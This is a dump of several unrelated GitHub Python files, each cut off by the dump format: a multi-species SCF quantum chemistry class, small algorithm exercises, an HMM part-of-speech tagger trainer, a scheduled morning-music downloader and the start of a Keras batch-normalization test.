###\n","repo_name":"bcgov/sbc-auth","sub_path":"auth-api/migrations/versions/b5578f6deba6_staff_remarks.py","file_name":"b5578f6deba6_staff_remarks.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"2841273676","text":"from __future__ import division\nfrom __future__ import print_function\n\nfrom ctypes import *\nimport numpy as np\nimport napmo\n# import matplotlib.pyplot as plt\n\nimport sys\nfrom scipy import linalg as SLA\n\n\nclass SCF(object):\n \"\"\"\n SCF Implementation\n\n Args:\n options (dict): Options to handle the SCF calculation\n pce (double) : Point charges energy\n \"\"\"\n\n def __init__(self, options=None, pce=0.0, pprint=True):\n super(SCF, self).__init__()\n self.options = {'maxiter': 100,\n 'eps_e': 1e-7,\n 'eps_n': 1e-7,\n 'eps_d': 1e-7,\n 'method': 'hf',\n 'kind': 'analytic',\n 'direct': False,\n 'print': True,\n 'debug': False}\n\n if options:\n self.options.update(options)\n\n if self.get('kind') == 'numeric':\n self.options['print'] = False\n\n if pprint:\n print(self)\n\n self._energy = 0.0\n self._pce = pce\n\n if pprint:\n print(\"Point charges energy: {0:<12.8f}\".format(self._pce))\n\n def iteration_single(self, psi, pprint=False):\n \"\"\"\n Performs a single iteration for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n \"\"\"\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid()\n psi.compute_xc_matrix()\n\n psi.build_fock()\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n self._energy = psi._energy + psi.pce\n\n if pprint:\n print('Single iteration {0:<3s} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(psi.symbol, psi._energy, self._energy, psi._rmsd))\n\n def single(self, psi, pprint=False, diis=True, other_psi=None):\n \"\"\"\n Perform SCF procedure for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint:\n print('\\nStarting Single SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s} {4:>12s}'\n .format(\"\\nIter\", \"E (\" + psi.symbol + \")\", \"Total E\", \"Delta(E)\", \"RMS(D)\"))\n\n iterations = 0\n e_diff = 1\n\n while (iterations < self.get('maxiter') and\n (np.abs(e_diff) > self.get('eps_e') or\n np.abs(psi._rmsd) > self.get('eps_d'))):\n\n iterations += 1\n e_last = psi._energy\n\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid()\n psi.compute_xc_matrix()\n\n if other_psi is not None:\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(other_psi, direct=self.get('direct'))\n\n psi.build_fock()\n\n # Iterate\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n if diis:\n with napmo.runtime.timeblock('DIIS'):\n napmo.cext.LibintInterface_diis(psi._diis, byref(psi))\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n e_diff = psi._energy - e_last\n\n self._energy = psi._energy + psi.pce\n\n # print results\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12.7f}'.\n format(iterations, psi._energy, self._energy, e_diff, psi._rmsd))\n\n # Debug info\n if self.get('debug') and not isinstance(psi, napmo.PSIO):\n if not isinstance(psi, napmo.PSIO):\n print('{0:11s} {1:>16.10f}'.format(\"ANALYTICAL \", self._energy))\n grid = napmo.BeckeGrid(psi.species, 500, 110)\n psi.plot_dens(grid=grid, kind=\"anal\")\n # plt.show()\n\n def multi(self, PSI, pprint=True, case=0):\n \"\"\"\n Perform SCF iteration for all species in this object.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint and case == 0:\n print('\\nStarting Multi SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n if pprint and case > 0:\n print('\\nRestarting Multi SCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 0\n e_diff = 1\n\n # Initialization\n beta_psi = [\n psi for psi in PSI if psi.symbol == 'e-beta'\n ][0] if self.options.get('spin', '') == 'polarized' else None\n\n for psi in PSI:\n # Calculate 2 body Matrix\n psi.compute_2body(self.get('direct'))\n psi.compute_coupling(PSI, direct=self.get('direct'))\n psi.compute_xc_grid(beta_psi)\n\n # XC grid must be calculated for all species before calculating\n # interspecies correlation\n for psi in PSI:\n psi.compute_c_2species_grid(PSI)\n\n for psi in PSI:\n psi.compute_xc_matrix()\n psi.build_fock()\n # self.compute_energy_single(psi, show=True)\n\n while (iterations < self.get('maxiter') and\n np.abs(e_diff) > self.get('eps_e')):\n\n iterations += 1\n\n e_last = self._energy\n\n if case == 0:\n\n for psi in PSI:\n psi.build_fock()\n\n # Iterate\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n # Update Matrices\n for psi in PSI:\n\n # Calculate 2 body Matrix\n with napmo.runtime.timeblock('2 body ints'):\n psi.compute_2body(self.get('direct'))\n psi.compute_xc_grid(beta_psi)\n\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n psi.compute_c_2species_grid(PSI)\n\n # XC Matrix, DFT Case\n for psi in PSI:\n psi.compute_xc_matrix()\n\n # if case is 1:\n # for psi in PSI:\n\n # with napmo.runtime.timeblock('2 body ints'):\n # psi.compute_2body(self.get('direct'))\n # psi.compute_xc(beta_psi)\n\n # psi.build_fock()\n\n # # solve F C = e S C\n # with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n # napmo.cext.wavefunction_iterate(byref(psi))\n\n # with napmo.runtime.timeblock('Coupling ints'):\n # psi.compute_coupling(PSI, direct=self.get('direct'))\n # # psi.compute_cor2species(PSI)\n\n # self.single(psi, pprint=False)\n\n # if self.get('debug'):\n # print(\"Single particle energy for \" +\n # psi.symbol + \":\", psi._energy + psi.pce)\n\n # if case is 2:\n # print('\\n Calculation does not converge!')\n # return\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff))\n\n # if iterations >= self.get('maxiter'):\n # case += 1\n # self.multi(PSI, case=case)\n # return\n\n # Debug\n if self.get('debug'):\n print('{0:11s} {1:>16.10f}'.format(\"\\nANALYTICAL \", self._energy))\n for psi in PSI:\n grid = napmo.BeckeGrid(psi.species, 100, 110)\n psi.plot_dens(grid, kind=\"anal\")\n # plt.show()\n # plt.savefig('analytic_dens.png')\n\n def nsingle(self, psi, pprint=True):\n \"\"\"\n Perform Numerical SCF procedure for one species.\n\n Args:\n psi (WaveFunction) : WaveFunction object for one species.\n pprint (bool): Whether to print or not the progress of the calculation.\n \"\"\"\n\n if pprint:\n print('\\nStarting Single NSCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s} {4:>12s}'\n .format(\"\\nIter\", \"E (\" + psi.symbol + \")\", \"Total E\", \"Delta(E)\", \"Delta(Orb)\"))\n\n iterations = 1\n e_diff = 1.0\n psi._rmsd = 1.0\n e_last = psi._energy\n\n converged = False\n while (not converged):\n\n e_last = psi._energy\n\n if iterations > 1:\n with napmo.runtime.timeblock('PSI optimization'):\n # Compute new psi\n psi.optimize_psi()\n\n with napmo.runtime.timeblock('Numerical 2 body'):\n psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n\n psi.build_fock()\n\n # if iterations > 2:\n # psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n # else:\n # psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n e_diff = psi._energy - e_last\n\n self._energy = psi._energy + psi.pce\n\n # print results\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12.7f}'.\n format(iterations, psi._energy, self._energy, e_diff, psi._optimize.delta_orb.sum()))\n\n if iterations > self.get('maxiter') or np.abs(e_diff) < self.get('eps_n'):\n if iterations > 1:\n converged = True\n\n iterations += 1\n\n # Debug\n if self.get('debug') and not isinstance(psi, napmo.PSIO):\n if not isinstance(psi, napmo.PSIO):\n psi.plot_dens(kind=\"num\")\n # plt.show()\n\n def nmulti(self, PSI, pprint=True):\n \"\"\"\n Perform SCF iteration for all species in this object.\n \"\"\"\n\n if pprint:\n print('\\nStarting Multi NSCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 1\n e_diff = 1\n converged = False\n while (not converged):\n\n e_last = self._energy\n\n for psi in PSI:\n\n if iterations > 1:\n # Compute new psi\n with napmo.runtime.timeblock('PSI optimization'):\n psi.optimize_psi(other_psi=PSI)\n\n # Calculate 2 body Matrix\n with napmo.runtime.timeblock('Numerical 2 body'):\n psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n\n psi.build_fock()\n\n # if iterations > 2:\n # psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n # else:\n # psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n for psi in PSI:\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n # psi.compute_cor2species(PSI)\n\n if self.get('debug'):\n print(\"Single particle energy for \" +\n psi.symbol + \":\", psi._energy + psi.pce)\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff))\n\n if iterations > self.get('maxiter') or np.abs(e_diff) < self.get('eps_n'):\n if iterations > 1:\n converged = True\n\n iterations += 1\n\n if self.get('debug'):\n for psi in PSI:\n psi.plot_dens(kind=\"num\")\n # plt.show()\n # plt.savefig('numeric_dens.png')\n\n def hmulti(self, PSI, pprint=True):\n \"\"\"\n Perform SCF iteration for all species in this object.\n \"\"\"\n\n if pprint:\n print('\\nStarting HYBRID Multi NSCF Calculation...')\n print('{0:5s} {1:^10s} {2:>12s} {3:>12s}'\n .format(\"\\nIter\", \"Energy\", \"Total E\", \"Delta(E)\"))\n\n iterations = 0\n e_diff = 1\n\n while (iterations < self.get('maxiter') and\n np.abs(e_diff) > self.get('eps_n')):\n\n # while (iterations < 3):\n iterations += 1\n\n e_last = self._energy\n\n if iterations > 1:\n for psi in PSI:\n psi.optimize_psi(self, PSI)\n\n for psi in PSI:\n\n # Calculate 2 body Matrix\n psi.compute_2body(self.get('direct'))\n # psi.compute_xc()\n psi.build_fock()\n\n if iterations > 2:\n psi.F[:] = psi.convergence.damping(psi.F, psi.D)\n else:\n psi.convergence = napmo.Convergence(psi.F, psi.D)\n\n # solve F C = e S C\n with napmo.runtime.timeblock('Self-Adjoint eigen solver'):\n napmo.cext.wavefunction_iterate(byref(psi))\n\n with napmo.runtime.timeblock('Coupling ints'):\n psi.compute_coupling(PSI, direct=self.get('direct'))\n # psi.compute_cor2species(PSI)\n\n if psi.symbol == 'e-':\n self.nsingle(psi, pprint=False)\n\n if self.get('debug'):\n print(\n \"Single particle energy for \" +\n psi.symbol + \":\", psi._energy + psi.pce)\n\n self.compute_energy(PSI)\n\n e_diff = self._energy - e_last\n\n if pprint:\n print('{0:<4d} {1:>12.7f} {2:>12.7f} {3:>12.7f} {4:>12s}'.\n format(iterations, self._energy - self.pce, self._energy, e_diff, str([str(psi._rmsd) for psi in PSI])))\n\n if self.get('debug'):\n for psi in PSI:\n psi.plot_dens(kind=\"num\")\n # plt.show()\n # plt.savefig('numeric_dens.png')\n\n def compute_energy_single(self, psi, show=False):\n \"\"\"\n Computes the total energy for a single species system.\n \"\"\"\n\n energy = (psi.D.T * (psi.H + 0.5 * psi.G + psi.J)).sum() + psi._xc_energy + self.pce\n\n if show:\n print(\"Symbol :\", psi.symbol)\n print(\"T : {0:>18.14f}\".format((psi.D.T * psi.T).sum()))\n print(\"V : {0:>18.14f}\".format((psi.D.T * psi.V).sum()))\n print(\"2body : {0:>18.14f}\".format((psi.D.T * 0.5 * psi.G).sum()))\n print(\"Coupling: {0:>18.14f}\".format((psi.D.T * psi.J).sum()))\n print(\"XC : {0:>18.14f}\".format(psi._xc_energy))\n print(\"Total E : {0:>18.14f}\".format(energy))\n\n return energy\n\n def compute_energy(self, PSI):\n \"\"\"\n Computes the total energy for a multi-species system.\n \"\"\"\n\n self._energy = 0.0\n self._coupling_energy = 0.0\n self._xc_energy = 0.0\n\n for psi in PSI:\n # Add independent particle energies\n self._energy += (psi.D.T * (psi.H + (0.5 * psi.G))).sum()\n\n # Calculate coupling energy\n self._coupling_energy += 0.5 * (psi.D.T * psi.J).sum()\n\n # Calculate XC energy\n self._xc_energy += psi._xc_energy\n\n # Add point charges energy\n self._energy += self.pce\n\n # Add coupling Energy\n self._energy += self._coupling_energy\n\n # Add XC energy\n self._energy += self._xc_energy\n\n def compute_energy_components(self, PSI):\n \"\"\"\n Computes the total energy for a multi-species system.\n \"\"\"\n self._kinetic_energy = 0.0\n self._1body_energy = 0.0\n self._pcqui_energy = 0.0\n self._2body_energy = 0.0\n self._coupling_energy = 0.0\n self._xc_energy = 0.0\n\n for psi in PSI:\n # Calculate kinetic energy\n self._kinetic_energy += (psi.D * psi.T).sum()\n\n # Calculate one body energy\n self._1body_energy += (psi.D * psi.H).sum()\n\n # Calculate point charges - quantum interaction energy\n self._pcqui_energy += (psi.D * psi.V).sum()\n\n # Calculate repulsion energy\n self._2body_energy += 0.5 * (psi.D * psi.G).sum()\n\n # Calculate coupling energy\n self._coupling_energy += 0.5 * (psi.D * psi.J).sum()\n\n # Calculate exchange correlation energy\n self._xc_energy += psi._xc_energy\n\n # Calculate potential energy\n self._potential_energy = (self.pce +\n self._2body_energy +\n self._pcqui_energy +\n self._coupling_energy +\n self._xc_energy)\n\n self._energy = self._potential_energy + self._kinetic_energy\n\n def get(self, key, default=None):\n \"\"\"\n Returns the option ``key`` of the SCF object\n \"\"\"\n return self.options.get(key, default)\n\n @property\n def pce(self):\n \"\"\"\n The point charges energy\n \"\"\"\n return self._pce\n\n @property\n def energy(self):\n \"\"\"\n The total energy\n \"\"\"\n return self._energy\n\n def show_results(self, PSI):\n \"\"\"\n Prints detailed results of the calculation\n \"\"\"\n self.compute_energy_components(PSI)\n\n print(\"\"\"\\n\nEnd SCF calculation\n--------------------------------------------------\n\nHartree-Fock Results:\n---------------------\n\n Total potential energy {0:>16.11f}\n Total kinetic energy {1:>16.11f}\n -----------------\n Total Energy {2:>16.11f}\n\n Virial ratio (V/T) {3:>16.11f}\n\n Potential energy components:\n\n Point charges energy {4:>16.11f}\n Quantum-Point energy {5:>16.11f}\n Repulsion energy {6:>16.11f}\n Coupling energy {7:>16.11f}\n Exc. corr. energy {8:>16.11f}\n -----------------\n Potential energy {9:>16.11f}\n\n\"\"\".format(self._potential_energy,\n self._kinetic_energy,\n self._potential_energy + self._kinetic_energy,\n np.abs(self._potential_energy / self._kinetic_energy),\n self.pce,\n self._pcqui_energy,\n self._2body_energy,\n self._coupling_energy,\n self._xc_energy,\n self._potential_energy))\n\n # for psi in PSI:\n # print(\"Orbitals: \", psi.symbol, \"\\n\", psi.O, \"\\n\")\n # print(\"Kinetic energy: \", psi.symbol, (psi.D * psi.T).sum())\n # print(\"Quantum-Point energy: \", psi.symbol, (psi.D * psi.V).sum())\n # print(\"Repulsion energy: \", psi.symbol, 0.5 * (psi.D * psi.G).sum())\n # print(\"Coupling energy: \", psi.symbol, 0.5 * (psi.D * psi.J).sum())\n # print(\"Exc. Corr. energy (fix): \", psi.symbol, psi._xc_energy, \"\\n\")\n\n def __repr__(self):\n out = (\"\"\"\\nSCF setup:\n\nMethod: {0:<10s}\nKind: {1:<10s}\nDirect: {2:<10s}\nE Tol: {3:<10.3e}\nDens Tol: {4:<10.3e}\nE Tol NUM: {5:<10.3e}\n\"\"\".format(self.get('method'),\n self.get('kind'),\n str(self.get('direct')),\n self.get('eps_e'),\n self.get('eps_d'),\n self.get('eps_n')\n ))\n\n return out\n","repo_name":"efposadac/nAPMO","sub_path":"napmo/scf/scf.py","file_name":"scf.py","file_ext":"py","file_size_in_byte":20955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7206971517","text":"'''\r\n @author: Pranshu Aggarwal\r\n @problem: https://hack.codingblocks.com/app/practice/1/67/problem\r\n'''\r\nMAX_SIZE = 1000005\r\nprimes = [0,2]\r\ndef sieve_of_eratosthenes():\r\n temp = [True if x%2 else False for x in range(0,MAX_SIZE)]\r\n temp[1], temp[2] = False, True\r\n for i in range(3, MAX_SIZE, 2):\r\n if(i*i a[i]:\n opt[2][i] = max(opt[2][i], 1 + max(opt[1][j], opt[2][j]))\n if j < i and a[j] < a[i]:\n opt[3][i] = max(opt[3][i], 1 + max(opt[2][j], opt[3][j]))\n # print(opt)\n if max(opt[2]) <= 0 or max(opt[3]) <= 0:\n return -math.inf\n return max(max(opt[1]), max(opt[2]), max(opt[3]))\n\n\nin_count = int(input())\nin_list = [0 for _ in range(in_count+2)]\nfor i in range(1, in_count+1):\n in_list[i] = int(input())\nprint(in_list)\nprint(f\"Length of longest N-shaped subsequence = {max_n_shaped_subseq(in_list)}\")\n","repo_name":"jvk36/UB-CSE-JV-CSE-331","sub_path":"hw_4_4_longest_N_shaped_subsequence/n_shaped_subseq.py","file_name":"n_shaped_subseq.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10220847517","text":"#HMM POS Tagger for Catalan\nimport io\nfrom collections import defaultdict\nimport sys\nimport copy\n\n#file_path = sys.argv[1]\n#print file_path\n#lines = [line.rstrip('\\n') for line in open(file_path)]\n\ntransition_dict = {} #of the form: {q0: {{NN:2}. {VB,4}}....}\nemission_dict = {}\ntrasition_count = {}\nemission_count = {}\ntransition_prob = {}\nemission_prob = {}\nlast = {}\npossible_tags_dict = {}\n\n\ninput_path=\"hmm_train.txt\"\nwith open(input_path, \"r\") as training_data:\n for line in training_data:\n tokens = line.split()\n # print \"\\n\"\n # print(tokens)\n prev=\"q0\"\n \n #trasition_count[prev] += 1\n \n\n for token in tokens:\n\n if prev not in transition_dict:\n transition_dict[prev] = {}\n #print \"make new tag entry for prev\" + prev\n\n len_of_token=len(token)\n #print(token)\n #print(len_of_token)\n word=token[0:len_of_token-3]\n tag=token[len_of_token-2:len_of_token]\n # print \"WORD: \" + word\n # print \"TAG: \" + tag\n # print \"PREV: \" + prev\n\n if tag not in emission_dict:\n emission_dict[tag] = {}\n \n \n\n if trasition_count.has_key(prev):\n trasition_count[prev] += 1 \n else:\n trasition_count[prev] = 1\n\n \n if tag in transition_dict[prev]:\n transition_dict[prev][tag] += 1\n else:\n transition_dict[prev][tag] = 1\n\n\n if word in possible_tags_dict:\n possible_tags_dict[word].add(tag)\n else:\n possible_tags_dict[word] = set()\n possible_tags_dict[word].add(tag)\n\n\n if word in emission_dict[tag]:\n emission_dict[tag][word] += 1\n else:\n emission_dict[tag][word] = 1\n\n \n prev = tag\n #store the last tags\n if last.has_key(prev):\n last[prev]=last[prev]+1\n else:\n last[prev] = 1\n\n\n\n\n# print transition_dict \n# print \"\\n\"\n# print trasition_count\n# print \"\\n\"\n# print emission_dict\n# print \"\\n\"\n# print last\n# print \"\\n\"\n\nemission_count = copy.deepcopy(trasition_count)\n\nfor t in last:\n if t in trasition_count:\n emission_count[t] += last[t]\n\n else:\n if t not in emission_count:\n emission_count[t] = last[t]\n else:\n emission_count[t] += last[t]\n\n \n\n\n# print trasition_count\n# print \"\\n\"\n# print emission_count\n# print \"\\n\"\n\nlen_transition_dict = 0\nlen_emission_dict = 0\n\nf = open('hmmmodel.txt','wb')\nlen_of_trans_count = len(trasition_count)\n# print \"\\n TRns count \"\n# print len_of_trans_count \n\n#f.write('Transmition\\n')\n\nfor prev1 in transition_dict:\n for tag1 in transition_dict[prev1]:\n #print prev1, tag1\n if prev1 not in transition_prob:\n transition_prob[prev1] = {}\n transition_prob[prev1][tag1] = (float)((1 + (float)(transition_dict[prev1][tag1])) / ((float)(trasition_count[prev1]) + len_of_trans_count)) #add 1 smoothing\n\n #(no. of transitions from prev1->tag1)/(no. of prev1 tags)\n len_transition_dict += 1\n \n transition_prob[prev1]['qX'] = 1 / (((float)(trasition_count[prev1]) + len_of_trans_count))\n#print transition_prob\n\n#len_transition_dict = len(transition_dict)\n# print \"\\n Length of transition dict: \" + str(len_transition_dict + len_of_trans_count)\n\nf.write(str(len_transition_dict + len_of_trans_count) + \"\\n\")\n\nfor prev1 in transition_dict:\n for tag1 in transition_dict[prev1]:\n s = prev1 +'\\t'+ tag1 + '\\t' + str(transition_prob[prev1][tag1]);\n f.write(s+\"\\n\")\n s = prev1 + '\\t'+ 'qX' + '\\t' + str(transition_prob[prev1]['qX']);\n f.write(s+\"\\n\")\n\n\n\n#f.write('Emission\\n')\n\nfor tag2 in emission_dict:\n for word2 in emission_dict[tag2]:\n #print prev1, tag1\n if tag2 not in emission_prob:\n emission_prob[tag2] = {}\n emission_prob[tag2][word2] = (float)((float)(emission_dict[tag2][word2]) / emission_count[tag2])\n #(no. of transitions from prev1->tag1)/(no. of prev1 tags)\n len_emission_dict += 1\n \n \n#len_emission_dict = len(emission_dict)\n# print \"\\n Length of emission dict: \" + str(len_emission_dict)\n\nf.write(str(len_emission_dict) + \"\\n\")\n\nfor tag2 in emission_dict:\n for word2 in emission_dict[tag2]:\n s = tag2 +'\\t'+ word2 + '\\t' + str(emission_prob[tag2][word2]);\n f.write(s+\"\\n\")\n\nfor key, value in possible_tags_dict.iteritems():\n f.write(key+' ')\n for all_tags in value:\n f.write(all_tags+' ')\n f.write('\\n')\n\n\n\n# print transition_prob\n# print emission_prob\n# print possible_tags_dict","repo_name":"Maithili2412/NLP","sub_path":"Hidden Markov Model/hmmlearn.py","file_name":"hmmlearn.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18122725206","text":"# cibele\nfrom _spy.vitollino.main import Cena, Elemento,Texto\nlinkDoGato =\"https://vignette.wikia.nocookie.net/character-stats-and-profiles/images/0/09/Garfield.png/revision/latest?cb=20170701143047\"\ndef Historia():\n\tcenaHouse = Cena (img = \"https://www.simsnetwork.com/sites/simsnetwork.com/files/styles/box-downloads/public/20140218-downloads-arbuckle-03.jpg?itok=TcZfhuU-\")\n\tgato = Elemento (img = linkDoGato,\n tit=\"Garfield\",\n style=dict(left=150, top=60, width=60, height=200))\n\tgato.entra(cenaHouse)\n\ttxtGato = Texto (cenaHouse, \"Hello\")\n\tgato.vai = txtGato.vai\n\tcenaHouse.vai()\nHistoria()","repo_name":"kwarwp/eva","sub_path":"callie/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14105619084","text":"class Solution:\n def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n arr = [0] * n\n for a, b in edges:\n arr[b] +=1\n ans = []\n for i in range(len(arr)):\n if arr[i] == 0:\n ans.append(i)\n return ans","repo_name":"Sol-cito/LeetCoding","sub_path":"1557-minimum-number-of-vertices-to-reach-all-nodes/1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_name":"1557-minimum-number-of-vertices-to-reach-all-nodes.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31161685265","text":"import schedule\r\n\r\nimport time\r\n\r\nimport request\r\nfrom download import download_start\r\nfrom alpha import Variables\r\nfrom alpha import BColors\r\n\r\n\r\nclass Musics:\r\n \"\"\"Music link storage\"\"\"\r\n musics = []\r\n melon_last_music = 0 # 마지막으로 재생한 멜론차트 순위를 기억\r\n\r\n\r\ndef init():\r\n \"\"\"Starts initialization\"\"\"\r\n print('\\n--ALL DONE--\\n\\n')\r\n Musics.musics = []\r\n print(Variables.schedule_time + \"에 재생 예정\")\r\n\r\n\r\ndef get_urls(amount, request_type, end):\r\n for i in range(0, amount):\r\n try:\r\n if request_type == 0:\r\n Musics.musics.append(request.link_request(i))\r\n else:\r\n Musics.musics.append(request.melon_request(i + end))\r\n Musics.melon_last_music += 1\r\n\r\n except IndexError:\r\n print(f'{BColors.WARNING}but playing only {len(Musics.musics)}{BColors.END}', end='')\r\n break\r\n\r\n except Exception as e:\r\n print(f'{BColors.WARNING}but Connection {BColors.FAIL}Failed{BColors.END}', end=' ')\r\n print('( ' + str(e), end=' )\\n\\n')\r\n if request_type == 0:\r\n print('Recovery System starting..')\r\n else:\r\n Musics.musics = []\r\n return\r\n print('\\n------------------------------------------------')\r\n return 'Success'\r\n\r\n\r\ndef execute(file_dir, amount: int):\r\n \"\"\"Starts at Scheduled Time\"\"\"\r\n week = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\r\n wday = time.localtime().tm_wday\r\n #wday = 0\r\n print('[' + week[wday] + ']')\r\n print('Checking api link: ', end='')\r\n try:\r\n request.link_request(1)\r\n except IndexError:\r\n init()\r\n return\r\n print(f'{BColors.GREEN}Success{BColors.END}\\n')\r\n if wday == 5:\r\n print('waiting 20min')\r\n time.sleep(1200)\r\n elif wday == 6:\r\n print('waiting 60min')\r\n time.sleep(3600)\r\n\r\n print(f'Trying to play {amount} musics', end=' ')\r\n if Musics.melon_last_music > 30: # 멜론에서 마지막으로 재생한 노래가 30번째가 넘어간다면 초기화\r\n Musics.melon_last_music = 0\r\n last_played = Musics.melon_last_music\r\n for i in range(0, 2):\r\n is_success = get_urls(amount, i, last_played)\r\n if is_success == 'Success':\r\n break\r\n\r\n for i in Musics.musics:\r\n for j in range(0, Variables.max_retry+1):\r\n try:\r\n is_success = download_start(file_dir, i)\r\n if is_success is False:\r\n init()\r\n return\r\n break\r\n\r\n except Exception as e:\r\n print(e.args)\r\n\r\n if j == Variables.max_retry:\r\n init()\r\n return print(f\"{BColors.FAIL}Critical Fail{BColors.END}\")\r\n\r\n time.sleep(1)\r\n print(f\"{BColors.WARNING}Progress Failed!{BColors.END}\", end=\" \")\r\n print(f\"{BColors.WARNING}retrying in 10 sec{BColors.END}\")\r\n time.sleep(10)\r\n print('\\n------------------------------------------------')\r\n init()\r\n\r\n\r\ndef before_execute():\r\n \"\"\"Executes Function 'execute' with Parameters\"\"\"\r\n execute(Variables.FILE_DIR, Variables.play_song_amount)\r\n\r\n\r\nif Variables.IS_os_WINDOWS is True:\r\n if not Variables.FILE_DIR.endswith(\"\\\\\"):\r\n Variables.FILE_DIR += \"\\\\\"\r\nelse:\r\n if not Variables.FILE_DIR.endswith(\"/\"):\r\n Variables.FILE_DIR += \"/\"\r\n\r\nschedule.every().day.at(Variables.schedule_time).do(before_execute)\r\nprint(BColors.GREEN + \"파일 경로: \" + Variables.FILE_DIR + BColors.END)\r\nprint(Variables.schedule_time + \"에 재생 예정\")\r\n\r\nwhile True:\r\n schedule.run_pending()\r\n time.sleep(0.1)\r\n","repo_name":"siwonKH/Wakeup-Music-Player","sub_path":"mornin-V4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36180746442","text":"import unittest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom theano import tensor as T\nfrom keras.layers import normalization\n\nclass TestBatchNormalization(unittest.TestCase):\n def setUp(self):\n self.input_1 = np.arange(10)\n self.input_2 = np.zeros(10)\n self.input_3 = np.ones((10))\n\n self.input_shapes = [np.ones((10,10)), np.ones((10,10,10))]\n\n def test_setup(self):\n norm_m0 = normalization.BatchNormalization((10,10))\n norm_m1 = normalization.BatchNormalization((10,10), mode=1)\n\n # mode 3 does not exist\n self.assertRaises(Exception,normalization.BatchNormalization((10,10),mode=3))\n\n def test_mode_0(self):\n \"\"\"\n Test the function of mode 0. Need to be somewhat lenient with the\n equality assertions because of the epsilon trick used to avoid NaNs.\n \"\"\"\n norm_m0 = normalization.BatchNormalization((10,), momentum=0.5)\n\n norm_m0.input = self.input_1\n out = (norm_m0.get_output(train=True) - norm_m0.beta)/norm_m0.gamma\n self.assertAlmostEqual(out.mean().eval(), 0.0)\n self.assertAlmostEqual(out.std().eval(), 1.0, places=2)\n\n self.assertAlmostEqual(norm_m0.running_mean, 4.5)\n self.assertAlmostEqual(norm_m0.running_std.eval(), np.arange(10).std(), places=2)\n\n norm_m0.input = self.input_2\n out = 